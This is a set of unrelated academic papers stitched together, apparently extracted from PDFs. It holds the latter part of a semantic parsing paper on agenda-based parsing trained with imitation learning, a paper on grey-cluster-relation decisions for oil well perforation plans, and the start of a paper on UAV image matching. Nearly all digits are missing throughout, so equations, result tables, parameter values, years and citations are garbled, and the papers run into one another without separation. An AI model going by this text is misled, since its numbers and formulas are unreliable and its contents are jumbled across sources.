obtain the highest scoring derivation in every parsing action. however, during training we sample from a distri- bution over derivations, not just return the argmax. sampling from the distribution over streams can be quite inaccurate. suppose the agenda contains two derivation streams: g contains one derivation with score and g contains derivations with score . then we would assign g probability e e +e = . instead of the true model probability e e + e = . . the issue is that the first derivation of g is not indicative of the actual probability mass in g. our solution is simple: before sampling (line in algorithm ), we process the agenda to guarantee that the sum of probabilities of all unscored deriva- tions is smaller than �. let g be the lazy agenda and g+ ⊆ g be the subset of derivation streams that contain more than one derivation (where unscored derivations exist). if for every g ∈ g+, pθ(g) =∑ d∈g pθ(d) ≤ � |g+|, then the probability sum of all unscored derivation is small: ∑ g∈g+ p(g) ≤ �. to guarantee that pθ(g) ≤ �|g+|, we unroll g un- til this stopping condition is satisfied. unrolling a stream from g = [d ,d , . . . ] means popping d from g, constructing a singleton derivation stream gnew = [d ], pushing gnew to the agenda and scoring the remaining stream based on the next derivation s(g) = s(d ) (figure ). to check if p(g) ≤ �|g+|, we define the follow- ing upper bound u on p(g), which is based on the number of derivations in the stream |g|: pθ(g) = ∑ d∈g e s(d)∑ g′∈g ∑ d′∈g′ e s(d′) ≤ |g|es(g[ ])∑ g′∈g e s(g′[ ]) = u where g[ ] is the first derivation in g. checking that u ≤ �|g+| is easy, since it is based only on the first derivation of every stream. once all streams meet this criterion, we know that the total unscored prob- ability is less than �. as learning progresses, there are be many low probability derivations which we can skip entirely. the last missing piece is ensuring that streams are sorted without explicitly scoring all derivations. we make a best effort to preserve this property. sorting derivation streams. all derivations in a stream g have the same child derivations, as they were constructed by one application of a seman- tic function f. thus, the difference in their scores is only due to new features created when applying f. we can decompose these new features into two disjoint feature sets. one set includes features that depend on the grammar rule only and are indepen- dent of the input utterance x, and another also de- pends on x. for example, the semantic function f = lex maps phrases, such as “born in”, to log- ical forms, such as placeofbirthof. most features extracted by lex do not depend on x: the con- junction of “born in” and placeofbirthof, the fre- quency of the phrase “born in” in a corpus, etc. however, some features may depend on x as well. for example, if x is “what city was abraham lin- coln born in”, we can conjoin placeofbirthof with the first two words “what city”. as another ex- ample, the semantic function bridge takes unary predicates, such as abelincoln, and joins them with any type-compatible binary to produce logi- cal forms, such as placeofbirthof.abelincoln. again, a feature such as the number of assertions in k that contain placeofbirthof does not de- pend on x, while a feature that conjoins the intro- duced binary (placeofbirthof) with the main verb (“born”), does depend on x (see section ). our strategy is to pre-compute all features that are independent of x before training, and sort streams for lex, this requires going over all lexicon entries once. for bridge, this requires going once over the kb. based on these features only, as an approximation for the true order. let’s assume that derivations re- turned by an application of a semantic function f are parameterized by an auxiliary set b. for example, when applying lex on “born in”, b will include all lexical entries that map “born in” to a binary predicate. when applying bridge on abelincoln, b will include all binary predicates that are type- compatible with abelincoln. we equip each b ∈b with a feature vector φb(b) (computed before train- ing) of all features that are independent of x. this gives rise to a score sb(b) = φb(b)>θ that depends on the semantic function only. thus, we can sort b before parsing, so that when the function f is called, we do not need to instantiate the derivations. note that the parameters θ and thus sb change during learning, so we re-sort b after every iteration (of going through all training examples), yielding an approximation to the true ordering of b. in practice, features extracted by lex depend mostly on the lex- ical entry itself and our approximation is accurate, while for bridge some features depend on x, as we explain next. features the feature set in our model includes all features de- scribed in berant et al. ( ). in addition, we add new lexicalized features that connect natural lan- guage phrases to binary predicates. in berant et al. ( ), a binary predicate is generated using a lexicon constructed offline via alignment, or through the bridging operation. as mentioned above, bridging allows us to join unary predicates with binary predicates that are type- compatible, even when no word in the utterance trig- gers the binary predicate. for example, given the ut- terance “what money to take to sri lanka”, the parser will identify the entity srilanka, and bridging will propose all possible binaries, including currency. we add a feature template that conjoins binaries suggested by bridging (currency) with all content word lemmas (“what”, “money”, “take”). after observing enough examples, we expect the feature corresponding to “money” and currency to be up- weighted. generating freely and reweighting using as in previous work, some features use the fact that the spelling of kb predicates is often similar to english words. features can be viewed as a soft way to expand the lexicon during training, similar to lexicon generation (zettlemoyer and collins, ). note that this fea- ture depends on the utterance x, and is not used for sorting streams (section ). finally, each feature is actually duplicated: one copy fires when choosing derivations on the agenda (algorithm , line ), and the other copy fires when choosing the final root derivation (line ). we found that the increased expressivity from separating fea- tures improves accuracy. experiments we evaluate our semantic parser on the webques- tions dataset (berant et al., ), which con- tains , question-answer pairs. the questions are about popular topics (e.g., “what movies does taylor lautner play in?”) and answers are sets of entities obtained through crowdsourcing (all questions are answerable by freebase). we use the provided train- test split and perform three random %- % splits of the training data for development. we perform lexical lookup for freebase entities using the freebase search api and obtain can- didate entities for every named entity identified by stanford corenlp (manning et al., ). we use the lexicon released by berant et al. ( ) to re- trieve unary and binary predicates. we execute λ- dcs logical forms by converting them to sparql and querying our local virtuoso-backed copy of freebase. during training, we use l regularization, and crudely tune hyperparameters on the develop- ment set (beam size k = , tolerance for the lazy agenda � = . , local reweighting β = , and l regularization strength λ = − ). we evaluated our semantic parser using the re- ward of the predictions, i.e., average f score on predicted vs. true entities over all test examples. . main results table provides our key result comparing the fixed-order parser (fixedorder) and our proposed agenda-based parser (agendail). in all subse- quent tables, train, dev., and test denote train- ing, development and test accuracies, |act.| denotes we use the official evaluation script from http:// www-nlp.stanford.edu/software/sempre/. http://www-nlp.stanford.edu/software/sempre/ http://www-nlp.stanford.edu/software/sempre/ test train |act.| |feat.| time fixedorder . . , , , agendail . . , , table : test set results for the standard fixed-order parser (fixedorder) and our new agenda-based parser (agendail), which substantially reduces parsing time and the number of parsing actions at no cost to accuracy. system authors acc. yv yao and van-durme ( ) . bcfl berant et al. ( ) . bdzz bao et al. ( ) . bwc bordes et al. ( ) . bl berant and liang ( ) . ydzr yang et al. ( ) . bwc + bl bordes et al. ( ) . wywh wang et al. ( ) . wywh wang et al. ( ) . ychg yih et al. ( ) . fixedorder this work . agendail this work . table : results on the webquestions test set. the average number of parsing actions (pops from agenda in agendail and derivations placed on chart in fixedorder) per utterance, |feat.| de- notes the average number of featurized derivations per utterance, and time is average parsing time in milliseconds. we found that agendail is x faster than fixe- dorder, performs x fewer parsing actions, and reduces the number of featurized derivations by an order of magnitude, without loss of accuracy. table presents test set results of our systems, compared to recently published results. we note that most systems perform question answering with- out semantic parsing. our fixed-order parser, fixe- dorder, and agenda-based parser, agendail, obtain an accuracy of . and . respectively. this improves accuracy compared to all previous systems, except for a recently published semantic parser presented by yih et al. ( ), whose accu- racy is . . we attribute our accuracy improvement compared to previous systems to the new features and changes to the model, as we discuss below. bcfl also used a fixed-order parser, but ob- tained lower performance. the main differences be- tween the systems are that (i) our model includes new features (section ) combined with l regular- ization, (ii) we use the freebase search api rather than string matching, and (iii) our grammar gener- algorithm dev. |act.| |feat.| time agendail . , , fixedorder . , , , agenda . , , fixed+agenda . , , α = . , , , α = . , , α = . , , p+w θ . , , p+c θ . , , pθ . , , , -binaryandlemma . , , table : development set results for variants of agendail. ates a larger space of derivations. . analysis to gain insight into our system components, we per- form extensive experiments on the development set. comparison with fixed-order parsing. figure compares accuracy, speed at test time, and number of derivations for agendail and fixedorder. for agendail, we show both the number of derivations popped from the agenda, as well as num- ber of derivations scored, which is slightly higher due to scored derivations on the agenda. we ob- serve that for small beam sizes, agendail sub- stantially outperforms fixedorder. this is since agendail exploits small beams more efficiently in intermediate parsing states. for large beams perfor- mance is similar. in terms of speed and number of derivations, we see that agendail is dramatically more efficient than fixedorder: with beam size – , it is roughly as efficient as fixedorder with beam size – . for the chosen beam size (k = ), agendail is x faster than fixe- dorder. for k = , performance is poor for agendail and zero for fixedorder. this highlights the in- herent difficulty of mapping to logical forms com- pared to more shallow tasks, as maintaining just a single best derivation for each parsing state is not sufficient. a common variant on beam parsing is to replace the fixed beam size k with a threshold α, and prune any derivation whose probability is at least α times smaller than the best derivation in that state (zhang et al., ; bodenstab et al., ). we imple- mented this baseline and compared it to agendail beam size a c c u ra c y fixedorder agendail beam size . . . . . . . . . ti m e ( se c ) fixedorder agendail beam size # d e ri v a ti o n s (t h o u sa n d s) fixedorder agendail (scored) agendail (popped) figure : comparing agendail and fixedorder for various beam sizes (left: accuracy, middle: parsing time at test time in seconds, right: number of thousands of derivations scored and popped). the x-axis is on a logarithmic scale. and fixedorder in table . we see that for α = , we get a faster algorithm, but a minor drop in performance compared to fixedorder. however, this baseline still featurizes x more derivations and is x slower than agendail. impact of learning. the agenda baseline uses an agenda-based parser to approximate the gradients of ( ). that is, we update parameters as in fixe- dorder, but search for k root derivations using the agenda-based parser, described in algorithm (where we pop the highest scoring derivation). we observe that agenda featurizes x more deriva- tions compared to agendail, and results in a . drop in accuracy. this demonstrates the importance of explicitly learning to choose correct actions dur- ing intermediate stages of parsing. since on the development set, fixedorder outperformed agendail by . points, we im- plemented fixed+agenda, where a fixed-order parser is used at training time, but an agenda-based parser is used at test time. this parser featurized . x more derivations compared to agendail, is . x slower, and has slightly lower accuracy. recall that agendail samples a history from p+cwθ , that is, using local reweighting and history compression. table shows the impact of sampling from p+wθ (local reweighting), p +c θ (history compres- sion), and directly from pθ, which reduces to policy gradient. we observe that sampling from pθ directly according to policy gradient results in very low ac- curacy, as this produces derivations with zero re- ward most of the time. both local reweighting and history compression alone improve accuracy (local acc. |feat.| time tr. dev. tr. dev. tr. dev. � = . . , , , � = − . . , , , � = − . . , , , � = − . . , , , nostream . . , , , table : accuracy, number of featurized derivations, and pars- ing time for both the training set and development set when varying the value of the tolerance parameter �. reweighting is more important), but both perform worse than agendail. impact of lazy agenda. we now examine the con- tribution of the lazy agenda. note that the lazy agenda affects training time much more than test time for two reasons: (a) at test time we only need to pop the highest scoring derivation, and the overhead of a priority queue only grows logarithmically with the size of the agenda. during training, we need take a full pass over the agenda when sampling, and thus the number of items on the agenda is important; (b) at test time we never unroll derivation streams, only pop the highest scoring derivation (see section ). in brief, using the lazy agenda results in a . x speedup at training time. to understand the savings of the lazy agenda, we vary the value of the tolerance parameter �. when � is very high, we will never unroll derivation streams, because for all derivation streams u ≤ �|g+| (section ). this will be fast, but sampling could be inaccurate. as � decreases, we unroll more derivations. we also compared to the nostream baseline, where the agenda holds derivations rather than derivation streams. agendail: fixedorder: what currency does jamaica accept ? what currency does jamaica accept ? , , , figure : number of derivations in every chart cell for the utterance “what currency does jamaica accept?”. agendail reduces the number of derivations in chart cells compared to fixedorder. table shows the results of these experiments. naturally, the number of featurized derivations in training increases as � decreases. in particular, nostream results in a . x increase in number of featurized derivations compared to no unrolling (� = ), and . x increase compared to � = − , which is the chosen value. similarly, average train- ing time is about . x slower for nostream com- pared to � = − . accuracy does not change much for various val- ues of �. even when � = , accuracy decreases by only . points compared to � = − . unexpect- edly, nostream yields a slight drop in accuracy. feature ablation. table shows an ablation test on the new feature template we introduced that conjoins binaries and lemmas during bridging (- binaryandlemma). removing this feature tem- plate substantially reduces accuracy compared to agendail, highlighting the importance of learning new lexical associations during training. example. as a final example, figure shows typ- ical parse charts for agendail and fixedorder. agendail generates only , derivations, while fixedorder constructs , derivations, many of which are unnecessary. in summary, we demonstrated that training an agenda-based parser to choose good parsing actions through imitation learning dramatically improves ef- ficiency and speed at test time, while maintaining comparable accuracy. discussion and related work learning. in this paper, we sampled histories from a distribution that tries to target the reference derivation d∗ whenever possible. work in imita- tion learning (abbeel and ng, ; daume et al., ; ross et al., ; goldberg and nivre, ) has shown that interpolating with the model (corre- sponding to smaller β) can improve generalization. we were unable to improve accuracy by annealing β from to , so understanding this dynamic re- mains an open question. parsing. in this paper, we avoided computing k derivations in each chart cell using an agenda and learning a scoring function for choosing agenda items. a complementary and purely algorithmic so- lution is lazy k-best parsing (huang and chiang, ), or cube growing (huang and chiang, ), which do not involve learning or an agenda. simi- lar to our work, cube growing approximates the best derivations in each chart cell in the case where fea- tures do not decompose work in the past attempted to speed up inference using a simple model that is trained separately and used to prune the hypotheses considered by the main parsing model (bodenstab et al., ; fitzgerald et al., ). we on the other hand speed up inference by training a single model that learns to follow good parsing actions. work in agenda-based syntactic parsing (klein and manning, ; pauls and klein, ) focused on a* algorithms where each derivation has a prior- ity based on the derivation score (inside score), and a completion estimate (outside score). good esti- mates for the outside score result in a decrease in the number of derivations. currently actions depend on the inside score, but we could add features based on chart derivations to provide “outside” information. adding such features would present computational challenges as scores on the agenda would have to be updated as the agenda and chart are modified. semantic parsing has been gaining momentum in recent years, but still there has been relatively lit- tle work on developing faster algorithms, especially compared to syntactic parsing (huang, ; kum- merfeld et al., ; rush and petrov, ; lewis and steedman, ). while we have obtained sig- nificant speedups, we hope to encourage new ideas that exploit the structure of semantic parsing to yield better algorithms. reproducibility. all code, data, and experiments for this paper are available on the codalab platform at https://www.codalab.org/worksheets/ x fdfad dd b baf b b b d /. acknowledgments we thank the anonymous reviewers and the action editor, jason eisner, for their thorough reviews and constructive feedback. we also gratefully acknowl- edge the support of the darpa communicating with computers (cwc) program under aro prime contract no. w nf- - - . references p. abbeel and a. ng. . apprenticeship learning via inverse reinforcement learning. in international conference on machine learning (icml). m. auli and a. lopez. . efficient ccg parsing: a* versus adaptive supertagging. in association for computational linguistics (acl). j. bao, n. duan, m. zhou, and t. zhao. . knowledge-based question answering as machine translation. in association for computational linguis- tics (acl). j. berant and p. liang. . semantic parsing via para- phrasing. in association for computational linguis- tics (acl). j. berant, a. chou, r. frostig, and p. liang. . semantic parsing on freebase from question-answer pairs. in empirical methods in natural language pro- cessing (emnlp). n. bodenstab, a. dunlop, k. hall, and b. roark. . beam-width prediction for efficient context-free pars- ing. in association for computational linguistics (acl), pages – . a. bordes, s. chopra, and j. weston. . question answering with subgraph embeddings. in empirical methods in natural language processing (emnlp). q. cai and a. yates. . large-scale semantic parsing via schema matching and lexicon extension. in asso- ciation for computational linguistics (acl). our system uses the sempre toolkit (http://nlp. stanford.edu/software/sempre). s. a. caraballo and e. charniak. . new figures of merit for best-first probabilistic chart parsing. compu- tational linguistics, : – . k. chang, a. krishnamurthy, a. agarwal, h. daume, and j. langford. . learning to search better than your teacher. arxiv. j. clarke, d. goldwasser, m. chang, and d. roth. . driving semantic parsing from the world’s re- sponse. in computational natural language learn- ing (conll), pages – . h. daume, j. langford, and d. marcu. . search- based structured prediction. machine learning, : – . j. duchi, e. hazan, and y. singer. . adaptive subgradient methods for online learning and stochas- tic optimization. in conference on learning theory (colt). n. fitzgerald, y. artzi, and l. s. zettlemoyer. . learning distributions over logical forms for refer- ring expression generation. in empirical methods in natural language processing (emnlp), pages – . y. goldberg and j. nivre. . training determinis- tic parsers with non-deterministic oracles. transac- tions of the association for computational linguistics (tacl), . google. . freebase data dumps ( - - ). https://developers.google.com/ freebase/data. l. huang and d. chiang. . better k-best parsing. in proceedings of the ninth international workshop on parsing technology, pages – . l. huang and d. chiang. . forest rescoring: faster decoding with integrated language models. in associ- ation for computational linguistics (acl). l. huang. . forest reranking: discriminative pars- ing with non-local features. in association for com- putational linguistics (acl). j. jiang, a. teichert, j. eisner, and h. daume. . learned prioritization for trading off accuracy and speed. in advances in neural information processing systems (nips). m. kay. . algorithm schemata and data struc- tures in syntactic processing. readings in natural language processing. d. klein and c. manning. . a* parsing: fast ex- act viterbi parse selection. in human language tech- nology and north american association for computa- tional linguistics (hlt/naacl). j. krishnamurthy and t. mitchell. . weakly super- vised training of semantic parsers. in empirical meth- ods in natural language processing and computa- tional natural language learning (emnlp/conll), pages – . https://www.codalab.org/worksheets/ x fdfad dd b baf b b b d / https://www.codalab.org/worksheets/ x fdfad dd b baf b b b d / http://nlp.stanford.edu/software/sempre http://nlp.stanford.edu/software/sempre https://developers.google.com/freebase/data https://developers.google.com/freebase/data j. kummerfeld, j. roesner, t. dawborn, j. haggerty, j. curran, and s. clark. . faster parsing by supertagger adaptation. in association for computa- tional linguistics (acl). t. kwiatkowski, l. zettlemoyer, s. goldwater, and m. steedman. . inducing probabilistic ccg grammars from logical form with higher-order unifi- cation. in empirical methods in natural language processing (emnlp), pages – . t. kwiatkowski, e. choi, y. artzi, and l. zettlemoyer. . scaling semantic parsers with on-the-fly ontol- ogy matching. in empirical methods in natural lan- guage processing (emnlp). m. lewis and m. steedman. . a* ccg parsing with a supertag-factored model. in empirical methods in natural language processing (emnlp). p. liang, m. i. jordan, and d. klein. . learning dependency-based compositional semantics. in as- sociation for computational linguistics (acl), pages – . p. liang. . lambda dependency-based composi- tional semantics. arxiv. c. d. manning, m. surdeanu, j. bauer, j. finkel, s. j. bethard, and d. mcclosky. . the stanford corenlp natural language processing toolkit. in acl system demonstrations. c. matuszek, n. fitzgerald, l. zettlemoyer, l. bo, and d. fox. . a joint model of language and per- ception for grounded attribute learning. in inter- national conference on machine learning (icml), pages – . a. pauls and d. klein. . k-best a* parsing. in as- sociation for computational linguistics (acl), pages – . s. ross, g. gordon, and a. bagnell. . a reduction of imitation learning and structured prediction to no- regret online learning. in artificial intelligence and statistics (aistats). a. rush and s. petrov. . vine pruning for efficient multi-pass dependency parsing. in human language technology and north american association for com- putational linguistics (hlt/naacl). r. sutton, d. mcallester, s. singh, and y. mansour. . policy gradient methods for reinforcement learning with function approximation. in advances in neural information processing systems (nips). s. tellex, t. kollar, s. dickerson, m. r. walter, a. g. banerjee, s. j. teller, and n. roy. . understand- ing natural language commands for robotic navigation and mobile manipulation. in association for the ad- vancement of artificial intelligence (aaai). z. wang, s. yan, h. wang, and x. huang. . an overview of microsoft deep qa system on stan- ford webquestions benchmark. technical report, mi- crosoft research. y. w. wong and r. j. mooney. . learning syn- chronous grammars for semantic parsing with lambda calculus. in association for computational linguis- tics (acl), pages – . m. yang, n. duan, m. zhou, and h. rim. . joint re- lational embeddings for knowledge-based question an- swering. in empirical methods in natural language processing (emnlp). x. yao and b. van-durme. . information extraction over structured data: question answering with free- base. in association for computational linguistics (acl). w. yih, m. chang, x. he, and j. gao. . semantic parsing via staged query graph generation: question answering with knowledge base. in association for computational linguistics (acl). m. zelle and r. j. mooney. . learning to parse database queries using inductive logic programming. in association for the advancement of artificial intel- ligence (aaai), pages – . l. s. zettlemoyer and m. collins. . learning to map sentences to logical form: structured classifica- tion with probabilistic categorial grammars. in uncer- tainty in artificial intelligence (uai), pages – . l. s. zettlemoyer and m. collins. . online learn- ing of relaxed ccg grammars for parsing to logical form. in empirical methods in natural language pro- cessing and computational natural language learn- ing (emnlp/conll), pages – . y. zhang, b. ahn, s. clark, c. v. wyk, j. r. curran, and l. rimell. . chart pruning for fast lexicalised- grammar parsing. in international conference on computational linguistics (coling). international conference on sensor network and computer engineering (icsnce ) a research of perforation plan-decision based on grey cluster relation xue jijun mechanical engineering college xi’an shiyou university xi’an, , shanxi, p.r.china e-mail: xue_jijun@ .com abstract—perforation completion in oil and gas wells is the most important way of completion engineering, the optimization of perforation completion’s designing is influenced by a variety of factors. in order to get the ideal effect of perforation operation, in this paper, a perforation plan-decision based on grey cluster relation is putted forward. it aims to provide a scientific guidance for the perforation. the simulation experimental results show that new models are effective, which offer one kind of science decision-making foundation for petroleum perforation. keywords-perforating operation; grey cluster relation; perforation plan-decision i. introduction perforated well completion as the most extensive and major method of the well’s completion, the reasonable selection of parameters for the program has great meaning of improving efficiency and reducing costs[ ][ ]. by establishing a quantitative regression model to study the relationship between the parameters of the perforation and the production ratio, this algorithm can also analysis how different factors (perforation elasticity, perforation penetration, shot density, perforation diameter, perforation phase angle) act on the production ratio and casing strength coefficient. it provides a reliable theoretical basis for the perforation parameter optimization, and gives different perforation completion optimization schemes [ ]. due to the mutual restriction of different parameters, the current subjective decision-making for perforation program can’t make all the factors to achieve the best at the same time. in order to solve the above problems and reduce the subjective influence of the decision maker, maximize the productivity ratio[ ], a perforation plan-decision based on grey cluster relations proposed[ - ]. ii. perforation plan-decision based on grey cluster relation perforation optimization needs to confirm a solution to maximize the production capacity. this solution depends on many factors and the main influencing factors are hole depth, pore size, pore density, phase angle, formation heterogeneity, drilling pollution degree and depth, perforation compaction thickness and degree. all these factors are acting on the decision-making of the solution on the same time. perforation plan-decision based on grey cluster has made the model of perforation parameters and the oil well productivity. gray parameters are clustered in the parameters of the perforation scheme, and the evaluation function is established to design the optimal scheme [ - ]. a. building of model first simulating and calculating the productivity ratio of oil and gas, then making a non-linear regression analysis, according to whether perforation penetration penetrate the drilling zone or not, an equation can be established, it indicates the relationship between perforating parameters and capacity. ) the regression equation when the perforation penetration does not penetrate the drilling zone: international conference on sensor network and computer engineering (icsnce )  pr= . y - . + . + . - . - . + . - . + . - . + . - . - . lg( )+ . - . + . - . - * w w k k r r h h h zr zr w w k k k k x k k k s s m m w zr j j x x w w . *lg( )+ . g( )+ . - . + . - . - . x k l k y y w w w zr zr c c c c y h  ) the regression equation that perforation penetration has penetrated the contaminated zone of drilling:  pr=- . + . - . + . - . . lg(k )+ . zr - . + . - . - . lg(k ) + . lg(k )+ . - . zr zr + . - . - . + . k k k k k k s s m m m j k x x x y y cj w w w c w w y y c c h - . + . + . k - . k zr zr - . + . w w h h h r r w w  the quantitative relationships between parameters (perforation penetration ks, perforation aperture kj, perforation phase xw, perforation compaction degree yc, perforation compaction thickness yh, drilling damage thickness wh, drilling pollution degree wc, shot density km, borehole radius rw, formation permeability kzr) and the oil production ratio pr is the basis for the optimization of perforating parameters. b. perforation program base on grey cluster relation the main factors in the decision-making of the perforation plan are six factors: perforation ratio, perforation phase angle, shot density, perforation penetration, perforation diameter and casing strength decreasing coefficient, which are expressed by attributes x , x , x , x , x , x respectively. initial feature object matrix d is made like this: n n n n n n x x x x x x x x x x x x d x x x x x x x x x x x x                              in the formula, ij x represents j th attribute of the ith scheme; in the j scheme j x represents the productivity ratio, j x is the phase angle, j x is the perforation diameter, j x is the hole depth, j x is the aperture, and j x is the casing strength reduction coefficient. there are n scheme and attributes. as the different dimensions will have an impact on decision-making, so the formula ( ) - ( ) are used to d for normalization. the normalization of attribute data based on the different effects caused by different attributes, the formula ( ) shows the method to normalize production ratio, which called upper limit method. inherent properties such perforation phase angle, shot density, perforation penetration, perforation diameter are concluded by extreme conversion method, shown as formula ( ). casing strength decreasing coefficient, as a cost-type attribute, calculated by the lower limit method, shown as formula ( ). j max( ) j j x r x   max( ) min( ) ij ij ij ij x r x x    min( ) j j j x r x   international conference on sensor network and computer engineering (icsnce ) in the formula, ,i j n   , the normalized decision matrix can be calculated: n( ) ij r r  . the grey clustering analysis is used to classify the attributes and the similar factors can be classified and simplified. ) initialize processing: ,      ij ij i r r r i j n  ) calculate the gray absolute correlation degree ik  of any two parameter index data ri and rk sequence ( , ,k i j n    ): n | || . * | | || ( ) . *( )| | | | | | | | | | | n i ij in j n k i kj ij ij k in j i k ik i k i k s r r s s r r r r r s s s s s s                             ) establishing attribute correlative sequence matrix according to the above gray absolute correlation degree:                                      the critical value  r ,  , in pursuit of accuracy the value of r is higher than . , the higher the r value, the more accurate the classification is , and the accurate value of r is determined by actual data, the ri and rk classified as similar attributes; when ij  ≥ r. ) several attributes can be merged by the calculation above, and an attribute can be chosen to instead of other similar attributes. a new feature matrix d’ and new normalization matrix ' , m n( ) ij r r  is established according to the grey clustering analysis, where m is the number of attributes and n is the number of schemes. ) computing information entropy ie and weight i  ( ,i m j n   ): '' '' ' '' ' ln( ) ln(n) n i ij ij j ij ij m ij j e r r r r r               in particular, when '' ij r  , let '' ''ln( ) ij ij r r  . ( ) i i m i i e i m e         and i   , m       , m  . establish an evaluation function zk: ' i , , m k ik i z r i m k n        when the evaluation function value z(rk) is larger, the corresponding scheme is better. the program has the largest value of z(k) is chosen as the final construction program. iii. simulation experiment white xx well in chang-qing oilfield, the reservoir depth of middle layer is . m, the total thickness is . m, the thickness of the perforated zone is . m, the porosity is . %, reservoir drainage radius is m, well-bore radius is . m, the pressure of formation is . mpa, the crude oil saturation pressure is . mpa, drilling pollution depth is . mm, the drilling pollution degree is . . the casing strength is . mpa, reservoir heterogeneity is . ( vertical permeability / horizontal permeability), the water saturation is . %, rock poisson's ratio is . , the inclination is º, the oil viscosity is . mpa.s, the perforation optimization scheme is shown as table . international conference on sensor network and computer engineering (icsnce ) table i. perforation table of white xx attributes program productivity ratio perforation phase angle (degree) shot density (holes/m) perforation penetration (mm) perforation diameter (mm) casing strength decreasing coefficient(%) a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . the initial feature matrix (x ) ij d  can be constructed from the data in table and the results are shown in table . the feature object matrix ( )ijr r  is established by the above equation ( ) - ( ) and the initial feature matrix d, is shown as table . the index data association matrix is established by the above equations ( ) and ( ): . . . . . . . . . . . . . .                     according to the correlation degree matrix, take the critical value . r , r , r and r can be regarded as same class, then take r represent this class. then the influencing attributes of perforation program are adjusted to: productivity ratio r , perforation phase angle r , shot density r , casing international conference on sensor network and computer engineering (icsnce ) strength decreasing coefficient r . establishing new normalization matrix r’=(rij) × , shown as table . table ii. establish the initial feature matrix d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .   t                                                                          table iii. establishment of feature object matrix r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . .                                                                            table iv. deals with the feature matrix by grey cluster relation r’ ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r .  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .        t                                                                     the attribute weight vectors  =( . , . , . , . ) are calculated according to formulas ( ) and ( ). then the evaluation function z is established according to ( ): z={ . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . }. the optimal scheme is a because the z value of scenario a is the largest. it means under the existing formation conditions, the best perforation program is: perforation bullet syd - , phase angle º, hole density m, wearing depth . mm, aperture . mm. iv. conclusion in this paper, a perforation plan-decision based on grey cluster relation is putted forward. this method can be widely used to predict the productivity of wells under different perforation conditions, determine the perforating efficiency of perforated bombs, and study how different factors (the international conference on sensor network and computer engineering (icsnce ) perforation elasticity, perforation penetration, shot density, perforation diameter, perforation phase angle) impose influence to productivity ratio, and casing strength decreasing coefficient. according to the pending reservoir, it also let the oil production capacity to achieve the higher perforation operating parameters and process of excellent combination. it also saves a lot of manpower, materials and time cost, and provide the theoretical basis for the design of completion perforation construction. references: [ ] deng guang-yong. application of optimized perforation technology in oilfield production[j]. new technology & new products of china, ( ): - . [ ] tian xin-ru. influence of optimization design of perforation scheme on oil and gas well productivity[j]. china petroleum and chemical standard and quality, , ( ): - . [ ] cuan ying, wang li-fan.selection of perforation plan based on mopso and topsis decision making[j]. science technology and engineering, , ( ): - . [ ] wang zhong. the application of fuzzy multiple attribute decision making to optimization of perforated completion[d]. xi’an shiyou university, . [ ] chou j r. kansei clustering using fuzzy and grey relation algorithms[j]. journal of interdisciplinary mathematics, , ( ): - . [ ] gong y c, ren z y, fei d, et al. grey relation-projection pursuit dynamic cluster method for multiattribute decision making assessment with trapezoidal intuitionistic fuzzy numbers[j]. control & decision, . [ ] xiao-jing l i, liu l j. comprehensive quality evaluation of intersections based on grey relation degree clustering[j]. journal of shandong jiaotong university, . [ ] guo san-dang,wang ling-ling,liu si-fen et al.grey cluster analysis base on the biggest relational grades[j]. mathematics in practice and theory, , ( ): - . [ ] li xue-mei; dang yao-guo; wang jun-jie.grey relational clustering model for panel data clustering on indicators and its application[j]. control and decision, , ( ): - . [ ] li xue-mei. grey multivariable modeling and its application[d]. nanjing university of aeronautics and astronautics the graduate school college of information science and technology, . international journal of advanced network, monitoring and controls volume , no. , research and realization on the key technology of motion image matching based on uav yuri shebzukhov department of the international relations belarusian state university of transport, republic of belarus , kirova street, gomel, , republic of belarus e-mail: oms@bsut.by wang yubian* department of railway transportation control belarusian state university of transport , kirova street, gomel, , republic of belarus e-mail: alika_wang@mail.ru abstract—with the development of communication network and computer software and hardware technology, especially the emergence of high-precision and high-resolution image sensors, the photography and measurement technology of aerial image have played an increasingly important role in today's geological survey. the traditional aeronautical measurement is carried out by a large manned aircraft. the collected measurement information has a large capacity and a wide shooting range, which is suitable for large-area operations. this type of measurement requires high hardware requirements and is expensive, and it is not suitable for small areas. uav aerial measurement system is used to measure the small areas, uav is in small size, with great flight fluctuation, but the data image collected is not accurate enough. in this paper, the common algorithms of image fast matching are compared to conduct in-depth research on gray-level matching and feature-based matching, and sift feature matching algorithm based on feature matching is proposed to obtain the measurement image as consistent as possible with the actual scene. the main features of the object to be measured can be obtained through the actual surface area image measurement test, which is of practical significance in the practical low-altitude small area surveying and mapping. keywords-uav; moving image; feature detection; image matching; image pre-processing i. introduction uav is named quad-rotor aircraft or quad-rotor uav [ ], it is a four-propeller sky aircraft with cross-shaped propellers. the uav can be used to take aerial photos or record video with an optical camera or miniature video recorder. uav photography measurement system is established on the basis of unmanned aerial vehicle (uav) mobile platform, it is a kind of advanced measurement technology to achieve high spatial resolution remote sensing image data, it is playing the very major role in the geological landform measurement, disaster reduction, disaster prevention, emergency rescue, emergency treatment, post-disaster reconstruction and so on. at present, in the aspect of uav it mainly relies on the image aerial camera to collect the image inland and aboard. the traditional measurement camera is not only expensive, but also needs to carry out film image scanning to obtain the digital image. its shooting quality is low and the measurement takes a long time. with the development of the uav aerial survey technology, storage and transmission technology, using the measurement type camera ccd image acquisition has been widely used, the ccd camera has the advantages of a low price, sensors work stability, high sensitivity, the camera ccd cannot direct measurement, the difference of image distortion correction is bigger, so before shot aircraft must be matching the calibration. doi: . /ijanmc- - javascript:; javascript:; international journal of advanced network, monitoring and controls volume , no. , ii. preprocessing of uav image as the uav photography system is equipped with a non-professional measuring digital camera, the performance of the instrument is unstable and the orientation element is uncertain, so bring out the optical distortion 